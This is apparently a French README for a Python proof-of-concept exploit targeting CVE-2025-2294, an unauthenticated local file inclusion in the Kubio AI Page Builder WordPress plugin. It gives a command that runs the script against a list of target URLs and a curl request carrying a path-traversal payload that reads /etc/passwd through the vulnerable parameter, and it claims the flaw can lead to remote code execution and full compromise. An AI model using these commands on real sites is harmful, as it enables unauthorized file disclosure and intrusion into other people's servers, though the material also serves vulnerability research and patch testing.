
PoC Python pour CVE-2025-2294, une inclusion locale de fichier non authentifiée dans le plugin WordPress Kubio AI Page Builder (≤2.5.1), démontrant la divulgation arbitraire de fichiers et une potentielle exécution de code à distance.
CVE-2025-2294 est une vulnérabilité critique 🔥 d'inclusion locale de fichier (LFI) affectant le plugin Kubio AI Page Builder pour WordPress (versions jusqu'à 2.5.1 inclus). Cette faille permet à des attaquants distants non authentifiés 👾 d'inclure des fichiers arbitraires sur le serveur via le paramètre d'URL __kubio-site-edit-iframe-classic-template.
L'exploitation de cette vulnérabilité peut conduire à la divulgation de fichiers sensibles 📂, à l'exécution de code à distance 💥 et à un compromis total du système 💀.
Muhammad Nizar — Chercheur en sécurité 🔐
GitHub: 0xWhoami35
YouTube: InfoSec Insight ▶️
N'hésitez pas à me contacter pour des questions ou une collaboration ! 🤝
Exécutez le script d'exploitation avec une liste d'URLs cibles :
python3 lfi.py -l list.txt
curl "https://target-website.com/?__kubio-site-edit-iframe-preview=true&__kubio-site-edit-iframe-classic-template=../../../../../../../etc/passwd"